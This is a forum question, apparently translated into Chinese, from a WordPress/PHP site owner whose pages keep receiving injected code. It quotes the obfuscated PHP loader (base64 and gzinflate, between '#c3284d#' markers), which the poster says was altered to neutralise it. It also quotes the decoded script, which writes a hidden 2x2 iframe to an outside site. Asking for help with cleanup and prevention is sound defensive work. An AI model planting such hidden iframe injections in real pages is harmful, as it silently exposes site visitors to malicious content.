在过去的几天里,我的网站一再成为 iframe 攻击的目标。该代码主要附加到 PHP 和 Javascript 页面。然后代码是 PHP base 64 编码,参见示例(我稍微更改了代码以中和它):
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
这个解码看起来像这样:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
一个共同点是所有代码都有注释“#c3284d#”,因此追踪恶意代码并不困难。但是很费时间...
我们在 Gradwell(英国)的共享服务器上,它们并没有特别有用。所以问题是我能做些什么来阻止这个问题重演?我知道 MySQL 注入攻击并使用 PHP 的 mysql_real_escape_string 来防范此类攻击。
该站点是PHP和MySQL驱动器。我们使用 MySQLFTP 并拥有一个用于 SSH 访问的 shell 帐户。我们使用 Wordpress(已停用插件的最新更新)。